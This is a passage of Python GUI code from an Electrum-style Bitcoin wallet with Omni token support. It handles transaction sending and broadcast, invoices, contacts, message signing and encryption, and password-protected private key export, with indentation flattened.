coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
def do_send_omni_tokens(self, preview = False):
# if run_hook('abort_send', self):
# return
r = self.read_send_omni_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
# NOTE: this is important to omnilayer protocol (sender is the first output, recipient is the second one)
tx.set_inverse_outputs()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def spend_coins_for_omni(self, coins):
self.set_pay_from(coins)
self.show_send_omni_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
